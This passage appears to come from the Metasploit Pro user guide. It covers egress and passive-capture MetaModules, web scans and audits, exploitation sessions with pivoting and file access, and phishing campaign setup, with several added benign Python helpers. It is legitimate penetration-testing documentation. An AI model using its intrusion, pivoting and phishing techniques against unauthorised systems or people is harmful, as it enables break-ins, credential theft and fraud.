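      needs_investigation  - unfiltered ports: traffic got through, state undetermined
      policy_holds         - True when the first two lists are empty
    """
    summarize_states(observed)  # validates every state before we reason about them
    # Only 'filtered' means the firewall stopped the traffic; the other three states
    # all mean the packet made it to the egress server.
    reached_server = {"open", "closed", "unfiltered"}
    unexpected = sorted(port for port, state in observed.items()
                        if state in reached_server and port not in allowed_ports)
    blocked_allowed = sorted(port for port, state in observed.items()
                             if state == "filtered" and port in allowed_ports)
    investigate = sorted(port for port, state in observed.items() if state == "unfiltered")
    return {
        "unexpected_egress": unexpected,
        "allowed_but_filtered": blocked_allowed,
        "needs_investigation": investigate,
        "policy_holds": not unexpected and not blocked_allowed,
    }


if __name__ == "__main__":
    # Constructed result of one test run and a constructed egress policy.
    sample_run = {80: "open", 443: "open", 25: "closed", 53: "unfiltered",
                  3389: "filtered", 22: "filtered"}
    policy_allows = {80, 443, 22}
    print(summarize_states(sample_run))
    print(evaluate_egress(sample_run, policy_allows))
```

A closed port is deliberately counted as an egress gap: the egress server simply had nothing listening, but the firewall let the packet out, which is what a segmentation test is checking. Unfiltered ports appear in both the gap list (when not allowed) and the investigation list, because the result is real but ambiguous.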
2. Find the Segmentation and Firewall Testing MetaModule and click the Launch button. The Segmentation and Firewall Testing configuration window appears.
3. From the Scan Config tab, choose one of the following scan target options:
Use default egress target - The MetaModule runs against the egress server that Metasploit has set up for testing outbound traffic.
Use a custom egress target - The MetaModule runs against a server that you have set up for testing outbound traffic. You can specify an IP or a fully qualified domain name. To learn how to set up a custom egress target, go to the Global Tools area located on the Projects page and download the Segmentation Target Setup Script. You can follow the instructions provided in the script to create a custom egress server.
4. From the Scan Config tab, choose one of the following port range options:
Use default nmap port set - Scans Nmap's 1000 most common ports.
Use a custom port range option - Scans the range of ports that you define.
5. Click the Generate Report tab. The Report configuration form appears.
6. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
7. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
8. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.
Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define mail server settings, select Administration > Global Settings > SMTP Settings.
9. Click the Launch button.
2. Find the Passive Network Discovery MetaModule and click the Launch button. The Passive Network Discovery window appears.
3. From the Pcap Configuration tab, select the Network Interface Card (NIC) you want to use to capture traffic. Metasploit Pro automatically detects the interfaces that are available.
4. Use the sliders to define the following limits for the packet capture:
Timeout - The time limit for the capture, in seconds.
Max File Size - The maximum file size for each file captured, up to 512 MB.
Max Total Size - The maximum size of the entire Pcap file, up to 2 GB. This value must be larger than the Max File Size.
Note: The packet capture runs until it meets the timeout limit or the maximum Pcap file size limit.
5. Click on the Filters tab. The Berkeley Packet Filters page appears.
6. Choose one of the following options, if you want to specify a BPF string:
Select Protocols from the following list - Choose this option if you want the MetaModule to automatically generate the BPF string based on the protocols and ports you have selected. The Passive Network Discovery MetaModule provides a list of the most common ports and services that you can choose from. After you select the protocols and ports for the BPF string, you can view the generated string at the bottom of the Filters page.
Manually enter a BPF string - Choose this option if you want to manually define the BPF string. For more information on BPF syntax, visit http://biot.com/capstats/bpf.html.
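To make the generated-string option concrete, the following Python builds a libpcap filter from a protocol/port selection in the same shape the Filters page produces ("tcp port 80 or udp port 53 ...") and then applies the same selection to packet records, which shows what the filter keeps. It is an added example for this guide, not the MetaModule's own generator; the selection format (a list of protocol and port-or-range pairs) and the packet records are constructed.

```python
"""Generate a BPF capture filter from a protocol/port selection and check packets
against it.

Added example; it is not the MetaModule's own filter generator. The selection
format (a list of (protocol, port or 'low-high') pairs) and the packet records
used below are constructed for this example.
"""
import re

_PORT_SPEC = re.compile(r"^(\d{1,5})(?:-(\d{1,5}))?$")
_PROTOCOLS = ("tcp", "udp")


def parse_port_spec(spec):
    """'443' -> (443, 443); '20-21' -> (20, 21). Rejects malformed or out-of-range values."""
    match = _PORT_SPEC.match(str(spec).strip())
    if not match:
        raise ValueError(f"bad port spec: {spec!r}")
    low = int(match.group(1))
    high = int(match.group(2)) if match.group(2) else low
    if not 0 <= low <= high <= 65535:
        raise ValueError(f"port spec out of range: {spec!r}")
    return low, high


def build_bpf(selection):
    """Return a libpcap filter such as 'tcp port 80 or udp port 53 or tcp portrange 20-21'.

    Duplicate clauses are dropped; the order otherwise follows the selection.
    """
    clauses = []
    for proto, spec in selection:
        proto = proto.lower()
        if proto not in _PROTOCOLS:
            raise ValueError(f"unsupported protocol: {proto!r}")
        low, high = parse_port_spec(spec)
        clause = f"{proto} port {low}" if low == high else f"{proto} portrange {low}-{high}"
        if clause not in clauses:
            clauses.append(clause)
    return " or ".join(clauses)


def matches(selection, packet):
    """True if packet would pass the filter built from selection.

    packet: {'proto': 'tcp' | 'udp', 'sport': int, 'dport': int}. Like BPF's 'port N',
    a clause matches when either the source or the destination port is in range, so
    the service's replies are captured along with the requests to it.
    """
    for proto, spec in selection:
        if packet["proto"].lower() != proto.lower():
            continue
        low, high = parse_port_spec(spec)
        if any(low <= port <= high for port in (packet["sport"], packet["dport"])):
            return True
    return False


def filter_capture(selection, packets):
    """Return only the packets the filter keeps, preserving capture order."""
    return [pkt for pkt in packets if matches(selection, pkt)]


if __name__ == "__main__":
    # Constructed selection and constructed packet records.
    selection = [("tcp", 80), ("tcp", "443"), ("udp", 53), ("tcp", "20-21")]
    print(build_bpf(selection))
    packets = [{"proto": "udp", "sport": 53, "dport": 40000},
               {"proto": "tcp", "sport": 50000, "dport": 21},
               {"proto": "tcp", "sport": 22, "dport": 50000}]
    print(filter_capture(selection, packets))
```

Tightening the filter this way is also the simplest control on how much credential-bearing traffic a passive capture stores: the BPF is compiled into the capture itself, so excluded traffic never reaches the Pcap file rather than being discarded afterwards.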
5. Click the Report tab. The Report configuration page appears.
6. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
7. Select whether you want to generate the report as a PDF, RTF, or HTML file.
8. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
9. Select the Mask discovered passwords option if you want to hide discovered credentials from the report.
10. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.
11. Click the Launch button. When the MetaModule launches, the Findings window appears. It contains the statistics and task log for the MetaModule run. You can track the total number of packets, bytes, and hosts that the MetaModule captures in real-time.
After the MetaModule completes its run, go to the Reports area to view the Passive Network Discovery Findings Report that the MetaModule generated. The report provides detailed information about the services and credentials that the MetaModule was able to capture for each host, as well as a graphical breakdown of the operating systems and services that were found.
MetaModule Reports
A report provides insight into an organization's security infrastructure. The goal of a report is to clearly convey the outcome of a penetration test to your readers. Each report in Metasploit Pro contains a high-level summary of results along with the technical details of the test. The report is organized into logical sections, which makes it easy to navigate and find key information. This is extremely useful in cases where you may need to share a single report across an organization.
Since the audience may be a mix of technical and non-technical readers, it is important that each report conveys data in a way that is useful and valuable to each type of reader. For example, senior management may want to quickly glance at the report, so a summary that visually relays the most significant information will most likely resonate the most with them. The IT or security teams, on the other hand, will be more interested in the technical details of the test, so they can mitigate any issues that were exposed by the test.
In Metasploit Pro, each MetaModule includes a specialized report. Each report contains information that is specific to the MetaModule that generates it. Each time you run a MetaModule, it automatically generates a report that details its findings. The data within each report represents a static snapshot of a target network and can be used as a benchmark to measure an organization's security posture. The following reports are available for MetaModules:
Firewall Egress Testing Report
Passive Network Discovery Report
Known Credentials Intrusion Report
Single Password Testing Report
SSH Key Testing Report
Pass the Hash Report
3. Click on the Generate Report tab.
4. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.
5. Choose whether you want to generate the report as a PDF, HTML, or RTF file.
6. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
7. From the Options area, select the Mask discovered passwords option if you want to obscure any passwords that the report contains. The report replaces the password with **MASKED**. By default, this option is disabled. You should enable this option if you plan to distribute the report.
8. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.
Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.
9. Configure the remaining options for the MetaModule, such as the scope of the test. When you are done, click the Launch button to run the MetaModule.
The following table describes the sections of the Firewall Egress Testing Report (ID, Report Section, Report Description).
1. Title Page - The front page of the report. It includes the Rapid7 logo, product name, and a brief description of the report contents.
2. Project Summary - Lists the project name and the user who generated the report.
3. Egress Summary - Lists the egress scan target used, port range scanned, and the run time for the test.
4. Port State Distribution - Shows a graphical breakdown of the critical and registered ports that are opened, filtered, and closed. If no data is available, then the report does not show a graph.
5. Lists all open critical ports that were not filtered by the firewall and provides additional information about each port, such as the port state, the service bound to the port, and the service description. Only the port state and port number are obtained from the firewall egress test; the service name and description are provided by the Internet Assigned Numbers Authority (IANA). If there is no data available, this section is not generated for the report.
6. Lists all open registered ports that were not filtered by the firewall and provides additional information about each port, such as the port state, the service bound to the port, and the service description. Only the port state and port number are obtained from the firewall egress test; the service name and description are provided by the Internet Assigned Numbers Authority (IANA). If there is no data available, this section is not generated for the report.
7. Provides additional information about port states, port groups, and services.
8. Lists the options that were used to generate the report.
The following table describes the sections of the Passive Network Discovery Report.
1. Title Page - The front page of the report. It includes the Rapid7 logo, product name, and a brief description of the report contents.
2. Project Summary - Lists the project name and the user who generated the report.
3. Findings Summary - Lists the packet capture details, such as the total capture time, number of packets captured, and the amount of data captured. The section also summarizes the number of hosts, services, and credentials the MetaModule discovered.
4. Host and Service Distribution - Shows a graphical breakdown of hosts and services that the MetaModule discovered. If no data is available, then the report does not show a graph.
5. Detailed Findings - Lists each host the MetaModule was able to discover and shows any ports it was able to enumerate.
6. Appendix: Report Generation Options - Lists the options that were used to generate the report.
The following table describes the sections of the report generated by the credential testing MetaModules.
1. Title Page - The front page of the report. It includes the Rapid7 logo, product name, and a brief description of the report contents.
2. Project Summary - Lists the project name and the user who generated the report.
3. Findings Summary - Lists the name of the MetaModule that was run, the test runtime, and the user name/password combination used to authenticate to a target range of hosts. If you enabled the Mask discovered passwords option when you configured the report settings, the report displays a masked password. The report also displays the number of hosts that the MetaModule targeted, the number of services that it attempted to log in to, and the number of successful logins it was able to obtain.
4. Authenticated Hosts and Services Summary Charts - Shows a graphical breakdown of hosts and services that the MetaModule was able to authenticate to. If no data is available, the report does not show a graph.
5. Detailed Findings - Lists the services and session details for each host that the MetaModule was able to authenticate to.
6. Appendix: Report Generation Options - Lists the options that were used to generate the report.
Chapter 13: Web Application Tests
To learn more about web application tests, read the following topics:
Web Scans
Web Scans
A web scan is the discovery process that Metasploit Pro uses to spider web pages and applications to search for active content and forms. During a web scan, the web scanner requests links and pages and parses the HTML for data. After a web scan completes, Metasploit Pro shows you the web server used to host each URL, or web application, and the number of pages and forms that were crawled.
When you configure a web scan, you should specify the maximum number of URL and page requests to control the duration of the web scan. By default, the maximum number of requests is set to 500 per web application. However, most web applications require up to 5,000 for complete site coverage. If you need more comprehensive site coverage, you should set the maximum number of requests to a value that satisfies your scan requirements. Just remember that the number of requests affects the time it takes the web scanner to complete. Additionally, you can set a limit on the amount of time that the scanner spends on each URL. You should set a time limit to reduce the scan time. Depending on the number of URLs that you are scanning, the entire web scan can be lengthy. When performing a web scan, you may need to adjust the web scan configuration multiple times before you achieve the results that you want.
Once the web application has been parsed, Metasploit Pro saves the data to the project. You'll be able to view the information for each web application, or URL, from the main Web Apps page.
URLs - Defines a list of URLs that the web crawler uses as a starting point. To specify a custom virtual host, prefix the name to the address and add a comma to separate the name from the address. For example, use intranet,http://192.168.0.1.
Maximum requests - Defines the maximum number of pages that the web crawler requests for each web page.
Time limit - Defines the maximum amount of time, in minutes, that the web crawler spends on each web site.
Concurrent requests - Defines the maximum number of concurrent requests that can be sent per site.
HTTP user name - Defines the user name that the web crawler uses to authenticate each request.
HTTP password - Defines the password that the web crawler uses to authenticate each request.
HTTP cookie data - Sets the seed for the initial cookie for each request.
HTTP user agent - Defines the user agent that the web crawler sends in each request.
To enable automatic authentication, you must define the HTTP username and HTTP password fields under the Advanced Web Crawler Settings on the web application scan configuration page. You can only define one user name and password combination per web scan.
For example, if you want to skip all URLs that contain private in the file path, you can specify */private* as the URL pattern. When the crawler encounters a URL, like http://your.domain.com/private, it skips the URL.
Define URLs - Enter the URLs that you do not want to scan or crawl.
Define Wild Card Expressions - Enclose the URL pattern that you want to use between two asterisks (*). Each URL pattern must be on a new line. For example, you can specify */admin* to blacklist any URLs that contain the word admin in the URL path.
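Two pieces of the scan configuration above are worth seeing as code: the seed URL entry syntax with an optional virtual host (intranet,http://192.168.0.1) and the exclusion list, which keeps the crawler away from paths such as admin pages where following links can change state. The following Python is an added example written for this guide, not Metasploit Pro's crawler. The entry and pattern syntax are the guide's; the matching semantics (case-insensitive, with * matching any characters including slashes) and the per-application request cap applied after exclusions are this example's own assumptions, and the URLs in it are constructed.

```python
"""Web scan scope helpers: seed URL entries with an optional virtual host, URL
exclusions, and the per-application request cap.

Added example, not Metasploit Pro's crawler. The 'vhost,http://addr' entry form and
the '*pattern*' exclusion form follow the guide; case-insensitive matching with '*'
spanning '/' is an assumption of this example.
"""
from fnmatch import fnmatchcase
from urllib.parse import urlsplit


def parse_seed_entry(entry):
    """Parse one entry of the URLs field.

    'intranet,http://192.168.0.1' -> virtual host 'intranet' sent as the Host header;
    'http://192.168.0.1'          -> no virtual host, Host header taken from the URL.
    """
    entry = entry.strip()
    vhost, url = None, entry
    if "," in entry:
        vhost, url = (part.strip() for part in entry.split(",", 1))
        vhost = vhost or None
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError(f"not an http(s) URL: {entry!r}")
    return {"vhost": vhost, "url": url, "host_header": vhost or parts.netloc}


def is_excluded(url, exclusions):
    """Return the exclusion entry that matches url, or None.

    Entries containing '*' are wildcard patterns ('*/private*'); any other entry is an
    exact URL. Matching is case-insensitive and '*' matches any characters, '/' included
    (assumptions of this example, not documented behaviour).
    """
    for entry in exclusions:
        entry = entry.strip()
        if not entry:
            continue
        if "*" in entry:
            if fnmatchcase(url.lower(), entry.lower()):
                return entry
        elif url.lower() == entry.lower():
            return entry
    return None


def select_requests(candidate_urls, exclusions, max_requests):
    """Apply exclusions, then the per-application request cap, in crawl order.

    Returns (to_request, skipped_by_exclusion, dropped_by_cap). A non-empty third
    list is the signal the guide describes: raise Maximum requests on the next scan
    if you need fuller site coverage.
    """
    to_request, skipped, dropped = [], [], []
    for url in candidate_urls:
        if is_excluded(url, exclusions) is not None:
            skipped.append(url)
        elif len(to_request) < max_requests:
            to_request.append(url)
        else:
            dropped.append(url)
    return to_request, skipped, dropped


if __name__ == "__main__":
    # Constructed seed entries and crawl candidates.
    print(parse_seed_entry("intranet,http://192.168.0.1"))
    found = ["http://your.domain.com/", "http://your.domain.com/private/notes",
             "http://your.domain.com/Admin/login", "http://your.domain.com/about"]
    print(select_requests(found, ["*/private*", "*/admin*"], max_requests=500))
```

Exclusions are checked before the cap so that a blacklisted URL never consumes part of the request budget, and exact-URL entries are compared whole rather than as prefixes, so excluding http://your.domain.com/logout does not also drop http://your.domain.com/logout-help.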
When these SSL options are enabled, the web scanner reports a vulnerability when a web server is not running over SSL. If the web server is running SSL, the web scanner checks for weak cryptographic ciphers. If weak ciphers are allowed, the web scanner reports a vulnerability against the web server.
4. Configure the web app scan options. Basically, you need to set a limit on the number of pages and links that the web scanner requests and the maximum amount of time that the web scanner spends on each web application. This number may need to be adjusted in subsequent scans in order to obtain the level of site coverage that you desire. Most web applications may need up to 5,000 requests.
5. Additionally, you can supply credentials that the web scanner uses to authenticate each request.
6. When you are ready to run the web app scan, click the Launch button.
Web Audit
A web audit is the process that identifies vulnerabilities that exist in the web application. The web scanner parses the information that was collected for the web application and uses that information to cross-reference vulnerability information. A web audit can discover the following classes of issues: XSS, SQL Injection, and LFI/RFI. If a vulnerability is identified for a web application, Metasploit Pro provides the following information for the affected website:
Host IP
Web application URL
Vulnerability category
Vulnerability name
Vulnerability rank
Vulnerability description
Vulnerability method
Vulnerability parameter
Vulnerable form data
Vulnerability proof
Maximum request/form - Determines the maximum number of requests that the web audit makes for each form.
Time limit/form - Determines the maximum amount of time, in minutes, that the web audit spends on each form.
Instance limit/form - Determines the maximum number of unique form instances that the web audit tests.
HTTP user name - Defines the user name that the web audit uses for authentication for each request.
HTTP password - Defines the password that the web audit uses for authentication for each request.
HTTP cookie data - Sets the seed for the initial cookie for each request.
HTTP user agent - Defines the user agent that the web audit sends in each request.
Reverse - Initiates a connection from the target system to the attacker.
Bind - Forces the target to open a listening port on the target system.
Auto - Selects the best method for the attacker to create a connection to the target system.
7. In the Listener Ports field, specify the range of ports that should be used for reverse connect back payloads.
8. If you have credentials that you want to use to authenticate your HTTP requests, you can provide them in the HTTP username and HTTP password fields under the Web Application Identification Settings area.
9. From the Target Web Vulnerabilities area, select the vulnerabilities that you want to exploit. By default, all known vulnerabilities are selected for you.
10. When you are done configuring the exploitation settings, launch the attack.
Including and Excluding Report Sections
E-mailing the Web Application Assessment Report
Naming the Web Application Assessment Report
Ordering the Vulnerabilities in the Web Application Assessment Report
appendices for the report. Any sections that have a marked check box will automatically be included in the report. To remove any sections, deselect the check box.
Ordering Vulnerabilities By
By default, if Metasploit Pro identifies vulnerabilities during a web application test, it will list the vulnerabilities by category in the Web Application Assessment Report. You can change the information that Metasploit Pro uses to sort the vulnerabilities. Reports can be sorted by the following information:
2. When the New Report form appears, click the Report type dropdown and choose Web Application Assessment.
3. From the Web Application Assessment Report Format options, choose the format you want to use to generate the report. The most commonly used format is PDF.
4. In the Report Name field, enter the name that you want to assign to the report. This is the name that displays on the Reports page in Metasploit Pro and the name that the system uses to save the report. You can choose to use the default naming convention, which uses the report type as the report name and appends the task number to it.
5. From the Report Sections options, deselect any report sections that you do not want to include in the report. By default, all sections are included.
6. Click the Order vulnerabilities by dropdown and select the value you want to use to sort the vulnerabilities.
7. If there are any hosts that you want to explicitly include in or exclude from the report, use the Included addresses and Excluded addresses fields to specify the addresses of those hosts.
8. If you want to e-mail the generated report, select the E-mail report option and enter a comma-separated list of the e-mail addresses that you want to send the report to. Note: If you choose to e-mail the report, make sure that you have configured the SMTP settings through the Global Settings.
9. Click the Generate button to create the report. The Task Log appears and shows you the progress of the report generation.
10. When the report generation is complete, select Reports > Show Reports to view a list of reports stored in the project.
11. Find the report you just generated. You can either view the report directly through your browser or download the report and save it to a location on your system.
Application URL - The URL where the vulnerability was found.
Vulnerable Host - The fully qualified domain name of the vulnerable web application.
Vulnerability Category - The Metasploit web vulnerability category to which the vulnerability belongs. Metasploit web vulnerability categories include Publicly-Writable-Directory, XSS, LFI, RFI, SQLi, and Version.
Vulnerability Name - The name of the identified vulnerability.
Vulnerability Risk - Identifies the likelihood of the vulnerability being exploited and measures the impact that exploitation will have. The vulnerability risk can be low, medium, or high.
Vulnerability Confidence - The level of certainty that the vulnerability exists. If the exploit was able to force the page to include a remote file, the confidence level will be 100%. If it was able to invoke an error, the confidence level will be 75%.
Vulnerability Description - Provides a description of the vulnerability.
Vulnerable Method - The HTTP request method used.
Vulnerable Parameter - The parameter in the request that can be used to manipulate data.
Proof - Provides the data that was used to prove the existence of a vulnerability.
Version - TikiWiki, awstats, basilic, cacti, coppermine, joomla, mybb, oscommerce, php-xml-rpc, tikiwiki1.9.8, tikiwiki8.3, wordpress, xss
CMDi - cmd, eval
Publicly Writable Directory - http_put
LFI - LFI
RFI - RFI
SQLi - sqli_blind_mysql, sqli_blind_postgres, sqli_blind, sqli
XSS - XSS
Command Injection - Executes the id command on a *nix system and looks at the output in the HTTP response. Uses the output as proof text.
Direct Object Reference - Uses the URL of insecurely exposed resources as proof text.
Local File Inclusion - Attempts to include a file from the server's file system and searches for the contents of that file. If the content is found, it is used as proof text.
PHP Code Evaluation - Uses PHP code to add two random numbers and searches for the product in the response. If the product is found, it is used as proof text, in addition to some parts of the HTTP response.
Remote File Inclusion - Attempts to add a remote file to the server's file system and searches for the contents of that file. If the content is found, it is used as proof text.
SQL Injection - Shows an excerpt of the error message as proof text.
SQL Injection (blind variant using differential analysis) - Displays "Boolean manipulation" because there is no proof text to display.
Unvalidated Redirect - Displays the response headers as proof text.
XSS - Shows an excerpt of the HTML code that contains the element that was injected as proof text.
CSRF - Shows the HTML for the vulnerable form as proof text. The HTML may not match the original HTML because it is sanitized before it is parsed.
Publicly Writable Directory - Uploads a file that contains a random string. If the file upload is successful, the random string will be used as proof text.
Unauthorized Access - Displays the URL of the insecurely exposed path as proof text.
Chapter 15: Host Tags
About Host Tags on page 320
Components of a Host Tag on page 320
Host Tag Tasks on page 322
Host Tag ID
The host tag ID, or simply host tag, consists of a single word or phrase with no spaces. Use a special character, like the underscore, to separate words. For example, you cannot use nexpose hosts, but you can use nexpose_hosts.
Description
The description describes the purpose of the host tag. For example, if you use host tags to identify different subnets, you can add a description to help you understand the purpose of the subnet. An example of a description is: Tags any hosts that are part of the IT team's subnet.
Include in summary report - Provides information about the host in the Executive Summary section of the report.
Include in report details - Provides information about the host in the Detailed Findings section of the report.
Critical finding - Marks the host information as critical.
6. Enable any of the following options: Include in report summary, Include in report details, and Critical Finding.
4. Locate the tag you want to delete and click Remove.
5. When the confirmation window appears, click OK to delete the host tag.
6. Save the tag.
4. Search for the tag you want to use. If you need to create a tag, you can enter the tag name in the search field, and Metasploit Pro will automatically create and apply the tag.
2. When the Host window appears, click on the host IP address to open the host details window.
4. Under the Update Tags area, locate the tag you want to edit.
5. Edit the description and any of the tag attributes.
3. When the Discovery Scan window appears, click the Advanced Options button.
4. Select the tags that you want to enable for automatic tagging.
3. When the Import window appears, click Browse to find and select the XML or ZIP file that you want to import into Metasploit Pro.
4. Under the Automatic Tagging area, find the tags that you want to enable for automatic tagging.
Chapter 16: Sessions
About Sessions on page 329
Active Sessions on page 330
Session Tasks on page 332
About Sessions
An active session provides a connection between the target system and the attacker. Metasploit Pro opens an active session if it can gain access to the host and run a successful attack. After you obtain an active session, you can use it to take control of the target system.
Active Sessions
Metasploit Pro opens an active session on a target system if an exploit or bruteforce attack is successful. An active session enables you to interact with and run tasks against the compromised host. A session can be a Meterpreter session or a command shell session. The session type depends on the type of attack that was used to obtain the session and the type of environment on which the session runs. To determine the session type, open the Sessions window and view the Type column, which shows the type of each session. An active session enables you to take control of the session to perform tasks within the target system.
Metasploit Pro opens a command shell session when the following events occur:
Successful exploit on *nix
SSH bruteforce on *nix
Telnet bruteforce on *nix
Tomcat bruteforce on *nix
Meterpreter Sessions
A Meterpreter session enables you to use VNC to gain access to the device and enables you to use a built-in file browser to upload or download sensitive information. Meterpreter shells are currently only available for Windows. Metasploit Pro opens a Meterpreter session when the following events occur:
Successful exploit on Windows
SSH bruteforce on Windows
Telnet bruteforce on Windows
SMB bruteforce on Windows
Tomcat bruteforce on Windows
Authentication Notes
All successful authentication results in an authentication note attached to the host and an entry in the corresponding reports. Some protocols and servers do not allow you to execute commands directly. For example, you can use FTP to bruteforce credentials, but after the attack finds a valid credential, you cannot run commands directly on the server, so the attacker cannot obtain a session. When this occurs during a bruteforce attack or an exploit, an alert appears on the Analysis tab indicating that the system identified a valid account but could not create a session. If the system identifies new credential information for a particular host, you can use the credentials to authenticate to the host outside Metasploit Pro.
Session Tasks
A session task is an action that you can perform within the active session. For example, session tasks enable you to collect evidence, access the file system, run a command shell, and create a pivot through the compromised host.
Session Details
The session details describe information about a particular session, such as the session type and the attack module that Metasploit Pro used to obtain the session. Additionally, when you view the session details for an active session, you can access the actions that are available for that session. The session details for a closed session describe the event history for the session.
Proxy Pivot
A proxy pivot sends attacks through the remote host and uses the remote host as a gateway over TCP/UDP. When a proxy pivot is active, discovery scans, bruteforce, and exploitation tasks originate from the pivoted host. Note: Metasploit Pro does not support IPv6 addresses for pivoting.
VPN Pivot
A VPN pivot creates a type of VPN tunnel to an exploited Windows host and turns the host into a pivot point for traffic. To create a VPN pivot, Metasploit Pro creates a hook at the kernel level of the target
system. The hook does not create an interface on the remote system and acts as a sniffer to return all traffic that Metasploit Pro initiates. When Metasploit Pro creates a VPN Pivot, the VPN Pivot appears as a local interface, which enables you to use IP forwarding and use the interface as a gateway to the target network. However, Metasploit Pro cannot create a bridge to a network that it is already attached to because it creates a conflicting route for the target network system. Therefore, you must verify that Metasploit Pro does not have an existing direct connection to any networks that have the same IP range and netmask as the target network. Note: Metasploit Pro does not support IPv6 addresses for pivoting.
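The route-conflict check that the paragraph above asks you to perform before creating a VPN pivot can be scripted. The following Python example is added here and is not code from Metasploit Pro or this guide. It parses a constructed `ip route`-style listing (the `SAMPLE_ROUTES` text is made up for the example, not captured from a real host) and reports any existing IPv4 route that overlaps a proposed pivot target. This generalizes the guide's "same IP range and netmask" condition to any overlapping prefix, since a route that covers or is covered by the target network also yields a competing path. It also rejects IPv6 targets, which the guide says are not supported for pivoting.

```python
import ipaddress

# Constructed sample of "ip route" output (made up for this example, not
# captured from a real Metasploit Pro host).
SAMPLE_ROUTES = """\
default via 10.1.0.1 dev eth0
10.1.0.0/16 dev eth0 proto kernel scope link src 10.1.0.20
172.16.5.0/24 dev eth1 proto kernel scope link src 172.16.5.2
192.168.0.0/24 dev eth0 scope link
"""


def parse_routes(text):
    """Parse "ip route" style lines into (network, interface) pairs.

    The default route is skipped: it matches every destination and is not a
    direct attachment to a specific network, so it cannot conflict with a
    pivot interface in the sense the guide describes.
    """
    routes = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] == "default":
            continue
        # A bare host address (no prefix length) becomes a /32 network.
        net = ipaddress.ip_network(fields[0], strict=False)
        iface = fields[fields.index("dev") + 1] if "dev" in fields else "?"
        routes.append((net, iface))
    return routes


def check_pivot_target(target_cidr, route_text=SAMPLE_ROUTES):
    """Return a list of reasons a VPN pivot to target_cidr would conflict.

    An empty list means the target is IPv4 and no existing direct route
    overlaps it, so the pivot interface can be added without creating a
    competing route for the target network.
    """
    target = ipaddress.ip_network(target_cidr, strict=False)
    problems = []
    if target.version != 4:
        # The guide states that IPv6 addresses are not supported for pivoting.
        problems.append(f"{target} is IPv6; pivoting supports IPv4 targets only")
        return problems
    for net, iface in parse_routes(route_text):
        if net.version == 4 and net.overlaps(target):
            problems.append(
                f"existing route {net} via {iface} overlaps pivot target {target}"
            )
    return problems


if __name__ == "__main__":
    for cidr in ("172.16.5.0/24", "10.1.7.0/24", "10.9.0.0/24", "fd00::/64"):
        found = check_pivot_target(cidr)
        print(cidr, "OK" if not found else "; ".join(found))
```

On a real host you would feed `check_pivot_target` the output of `ip route` (or the equivalent listing on Windows) instead of the constructed sample; any reported overlap means the pivot would create the conflicting route the guide warns about, and the direct connection should be removed or the target re-addressed before the pivot is started.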
Virtual Interfaces
In order to provide VPN pivot functionality on the Windows platform, Metasploit Pro must install a new network driver. The driver, msftap.sys, creates four virtual interfaces on the installed system, which provides the ability to run up to four concurrent VPN Pivot sessions. If Metasploit Pro does not locate the virtual interfaces when MetasploitProSvc starts, Metasploit Pro automatically installs the network drivers. To reinstall or uninstall these drivers, you can use one of the batch scripts that are available. You can locate the batch scripts at: $INSTALLROOT\apps\pro\data\drivers\<arch>\. You can use the scripts to disable the VPN Pivot virtual interfaces or restore a previously removed driver.
VNC Sessions
You can use an active Meterpreter session to obtain a VNC session with the compromised system. You can either connect to the remote desktop manually or use the VNC client that is available through Metasploit Pro. The VNC client is a Java applet that you can use to remote desktop to the target system. Before you use the Java applet, install the latest Java for your platform. You can download the latest version of Java at http://www.java.com/en/download/manual.jsp. If you do not want to use the Java applet, you can use an external client, such as VNC Viewer.
4. When the confirmation window appears, click OK to continue.
5. Choose to connect manually or to use a Java applet.
File Systems
For Meterpreter sessions, you can use the Metasploit Pro interface to browse the file system on the compromised system. Additionally, you can upload, download, or delete files.
Chapter 17: Social Engineering
About Social Engineering on page 336
Social Engineering Techniques on page 338
Social Engineering Components on page 341
Social Engineering Workflow on page 342
Campaign Dashboard on page 346
Campaign Management on page 351
Reusable Campaign Resources on page 372
USB Key Campaigns on page 383
Phishing Campaigns on page 387
Social Engineering Report on page 393
3. Locate the browser address bar.
4. Append /campaigns to the end of the URL and press Enter. The old campaigns area appears.
Phishing
Phishing is a social engineering technique that attempts to acquire sensitive information, such as user names, passwords, and credit card information, from a human target. During a phishing attack, a human target receives a bogus e-mail disguised as an authentic e-mail from a trusted source, like a financial institution. The e-mail contains a link to open a fake web page that looks nearly identical to the official site. The style, logo, and images may appear exactly as they are on the real website. If the human target fills out the web form, you can collect the information as evidence. To set up a phishing attack in Metasploit Pro, you need to create a campaign that contains the following components:
E-mail component - Defines the content that you want to send in the e-mail body, and the human targets that you want to receive the phishing attack. Each campaign can only contain one e-mail component.
Web page component - Defines the web page path, the HTML content, and the redirect URL. The web page that you create must contain a form that a human target can use to submit information.
When you run the campaign, Metasploit Pro creates a web server on your local system to host the web page. When a human target clicks on the tracking link and visits the web page, Metasploit Pro records the visit and any information that the human target submits through the web form.
Client-Side Exploits
A client-side exploit attacks vulnerabilities in client software, such as web browsers, e-mail applications, and media players. In a client-side exploit, the victim must visit a malicious site in order for the exploit to run. A client-side exploit differs from a traditional exploit because it requires the victim to initiate the connection between their machine and the attacking machine; traditional exploits do not require human interaction. When a human target visits the web page that contains the exploit, a session opens on the target's machine and gives you shell access to the target's system, if that system is vulnerable to the exploit. Using the session, you can do things like capture screenshots, collect password files, and pivot to other areas of the network.
To set up a client-side exploit in Metasploit Pro, you need to create a campaign that contains the following components:
